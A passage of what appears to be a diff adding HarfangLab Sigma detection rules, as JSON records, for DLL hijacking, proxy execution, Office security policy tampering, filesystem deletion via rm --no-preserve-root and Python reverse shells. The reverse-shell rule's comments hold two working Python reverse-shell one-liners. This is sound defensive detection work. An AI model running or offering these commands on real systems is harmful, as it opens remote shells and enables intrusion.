to determine if the usage of this software is legitimate.\n", + "rule_creation_date": "2024-05-10", + "rule_modified_date": "2025-04-14", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1040" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "309b6676-766c-4e8f-9570-9385f7522c2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604123Z", + "creation_date": "2026-03-23T11:45:34.604126Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604134Z", + "rule_level": "high", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers", + "https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4" + ], + "name": "t1560_001_unrar_decompress_robotdropper.yml", + "content": "title: RobotDropper Archiver Tool Execution\nid: 309b6676-766c-4e8f-9570-9385f7522c2e\ndescription: |\n Detects when the archiver tool WinRAR is used with arguments specific to 
RobotDropper.\n These parameters are used by threat actors to uncompress the password protected archive containing the payload.\n The payload is usually a Dll used for DLL Side-Loading.\nreferences:\n - https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers\n - https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4\ndate: 2025/01/08\nmodified: 2025/06/30\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.RobotDropper\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rar:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\unrar.exe x -p* -o+ *.rar'\n ParentImage: '?:\\Windows\\System32\\msiexec.exe'\n\n selection_7z:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\7z.exe x *\\AppData\\Roaming\\\\* -oC*\\AppData\\Roaming\\\\* -y -p*'\n GrandparentImage: '?:\\Windows\\System32\\msiexec.exe'\n condition: 1 of selection_*\nlevel: high\nconfidence: weak", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "309b6676-766c-4e8f-9570-9385f7522c2e", + "rule_name": "RobotDropper Archiver Tool Execution", + "rule_description": "Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\nThese parameters are used by threat actors to uncompress the password protected archive containing the payload.\nThe payload is usually a Dll used for DLL Side-Loading.\n", + "rule_creation_date": "2025-01-08", + "rule_modified_date": "2025-06-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection" + ], + "rule_technique_tags": [ + "attack.t1560", + "attack.t1560.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.088132Z", + "creation_date": "2026-03-23T11:45:34.088134Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.088138Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/0gtweet/status/1581185123218690048", + "https://attack.mitre.org/techniques/T1218/" + ], + "name": "t1218_tpmtool.yml", + "content": "title: Proxy Execution via TpmTool.exe\nid: 30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28\ndescription: |\n Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\n Attackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\n This technique can be used to bypass security restrictions that are based on the parent process.\n It is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\nreferences:\n - https://twitter.com/0gtweet/status/1581185123218690048\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/10/27\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - 
attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.TpmTool\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_grandparent:\n GrandparentCommandLine|contains|all:\n - 'drivertracing'\n - 'stop'\n\n selection_parent:\n ParentCommandLine|endswith: '\\cmd.exe /c logman.exe stop TPMTRACE -ets'\n\n filter_legitimate:\n OriginalFileName: 'Logman.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28", + "rule_name": "Proxy Execution via TpmTool.exe", + "rule_description": "Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\nAttackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\nThis technique can be used to bypass security restrictions that are based on the parent process.\nIt is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\n", + "rule_creation_date": "2022-10-27", + "rule_modified_date": "2025-01-13", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": 
"strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.588794Z", + "creation_date": "2026-03-23T11:45:34.588797Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.588805Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_cmdl32.yml", + "content": "title: DLL Hijacking via cmdl32.exe\nid: 310c3bfc-817d-4a9b-bcb8-d1c7a7835b67\ndescription: |\n Detects potential Windows DLL Hijacking via cmdl32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: 
HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cmdl32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\cmpbk32.dll'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67", + "rule_name": "DLL Hijacking via cmdl32.exe", + "rule_description": "Detects potential Windows DLL Hijacking via cmdl32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + 
"rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093500Z", + "creation_date": "2026-03-23T11:45:34.093502Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093507Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/" + ], + "name": "t1562_001_office_disable_security_policy.yml", + "content": "title: Microsoft Office Security Policy Disabled\nid: 3173c69e-b742-4068-89fd-0dcb22d5d4d1\ndescription: |\n Detects when policy regarding Office applications security is set to disabled.\n This rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\n Some attackers set those values upon compromising endpoints to ease 
further exploitations in the future.\n It is recommended to investigate the process that set the registry key for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\ndate: 2020/09/28\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details: 'DWORD (0x00000001)' # value 1 == No Security checks for macros (Not recommended, code in all documents can run)\n TargetObject:\n # covers \\office\\12.0/14.0/16.0... \\Word / Excel\\Security\\VBAWarnings\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\VBAWarnings'\n # disable Protected View for files downloaded from the internet.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableInternetFilesInPV'\n # disable Protected View for files located in unsafe locations (temporary directories,...)\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableUnsafeLocationsInPV'\n # disable Protected View for files containing attachements.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableAttachementsInPV'\n # enable all macros without warns.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\Level'\n\n # For office we detect only if the modification is related to a suspicious action (via a macro for example)\n selection_office:\n ProcessOriginalFileName:\n - 'Excel.exe'\n - 'Lync.exe'\n - 'MSACCESS.EXE'\n - 'OneNote.exe'\n - 'Outlook.exe'\n - 'POWERPNT.EXE'\n - 'WinWord.exe'\n ProcessSigned: 'true'\n 
ProcessSignature : 'Microsoft Corporation'\n\n filter_office_ui:\n StackTrace|contains: '\\Mso??UIwin32client.dll!'\n\n exclusion_services:\n Image|endswith:\n - '\\windows\\system32\\svchost.exe'\n - '\\windows\\syswow64\\svchost.exe'\n - '\\windows\\system32\\services.exe'\n\n exclusion_windowsupdate:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessParentImage:\n - '*\\WindowsUpdateBox.exe'\n - '*\\sources\\setupprep.exe'\n\n exclusion_citrix_profile_manager:\n Image: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n\n exclusion_ivanti:\n Image:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n\n exclusion_sagekey:\n Image: '?:\\Program Files (x86)\\Common Files\\Sagekey Software\\StartAccess_2003.exe'\n\n exclusion_ecscad:\n Image: '?:\\Program Files\\MuM MT\\ecscad 2016\\ecscad\\EcsController.exe'\n\n exclusion_msaaccess:\n Image|endswith: '\\MSACCESS.EXE'\n ProcessParentImage|endswith: '\\MSACCESS*.EXE'\n ProcessGrandparentImage|endswith: '\\e.magnus.exe'\n\n exclusion_intersystems:\n ProcessOriginalFileName: 'CWS.exe'\n\n exclusion_share:\n ProcessProcessName:\n - 'reg.exe'\n - 'regedit.exe'\n - 'cscript.exe'\n ProcessCommandLine|contains: '\\\\\\\\'\n\n exclusion_res_software:\n ProcessParentImage: '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n\n exclusion_magnus:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n exclusion_aucotec:\n ProcessImage: '?:\\Program Files (x86)\\Aucotec\\Engineering Base *\\bin\\EngineeringBase.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'AUCOTEC AG'\n\n exclusion_natus:\n ProcessOriginalFileName:\n - 'Wave.exe'\n - 
'XLDB.EXE'\n ProcessSigned: 'true'\n ProcessSignature : 'Natus Medical Incorporated'\n\n exclusion_immidio:\n ProcessParentImage: '?:\\Program Files\\Immidio\\Flex Profiles\\FlexService.exe'\n\n condition: ((selection and not selection_office) or (selection and selection_office and not filter_office_ui)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1", + "rule_name": "Microsoft Office Security Policy Disabled", + "rule_description": "Detects when policy regarding Office applications security is set to disabled.\nThis rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\nSome attackers set those values upon compromising endpoints to ease further exploitations in the future.\nIt is recommended to investigate the process that set the registry key for suspicious activities.\n", + "rule_creation_date": "2020-09-28", + "rule_modified_date": "2025-04-24", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "31777514-089e-478f-8335-ce2e3f30e79e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + 
"origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.597347Z", + "creation_date": "2026-03-23T11:45:34.597353Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.597364Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://man7.org/linux/man-pages/man1/rm.1.html", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux", + "https://attack.mitre.org/techniques/T1485/", + "https://attack.mitre.org/techniques/T1070/004/" + ], + "name": "t1485_delete_filesystem_linux.yml", + "content": "title: Filesystem Deletion\nid: 31777514-089e-478f-8335-ce2e3f30e79e\ndescription: |\n Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\n Adversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\n It is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\nreferences:\n - https://man7.org/linux/man-pages/man1/rm.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/01/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: 
'/rm'\n CommandLine|contains: '--no-preserve-root'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "31777514-089e-478f-8335-ce2e3f30e79e", + "rule_name": "Filesystem Deletion", + "rule_description": "Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\nAdversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\nIt is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\n", + "rule_creation_date": "2023-01-06", + "rule_modified_date": "2025-04-14", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.impact" + ], + "rule_technique_tags": [ + "attack.t1070.004", + "attack.t1485" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "319422fe-e9e9-4e50-becd-b946bfa14f25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.619443Z", + "creation_date": "2026-03-23T11:45:34.619445Z", + "enabled": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:34.619449Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", + "https://attack.mitre.org/techniques/T1059/006/" + ], + "name": "t1059_006_reverse_shell_python_linux.yml", + "content": "title: Reverse Shell Executed via Python (Linux)\nid: 319422fe-e9e9-4e50-becd-b946bfa14f25\ndescription: |\n Detects the suspicious usage of Python related to reverse shells.\n Reverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\n It is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/07/01\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Python\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n 
CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "319422fe-e9e9-4e50-becd-b946bfa14f25", + "rule_name": "Reverse Shell Executed via Python (Linux)", + "rule_description": "Detects the suspicious usage of Python related to reverse shells.\nReverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\nIt is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\n", + "rule_creation_date": "2022-07-01", + "rule_modified_date": "2025-02-19", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.006" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "319b37d1-f75a-4426-9484-efa3e3788527", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.592677Z", + "creation_date": 
"2026-03-23T11:45:34.592681Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.592689Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_licensingdiag.yml", + "content": "title: DLL Hijacking via licensingdiag.exe\nid: 319b37d1-f75a-4426-9484-efa3e3788527\ndescription: |\n Detects potential Windows DLL Hijacking via licensingdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licensingdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\CLIPC.dll'\n - '\\fastprox.dll'\n - 
'\\licensingdiagspp.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "319b37d1-f75a-4426-9484-efa3e3788527", + "rule_name": "DLL Hijacking via licensingdiag.exe", + "rule_description": "Detects potential Windows DLL Hijacking via licensingdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "31ccdc74-069f-43fc-87d2-615dcae0c977", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + 
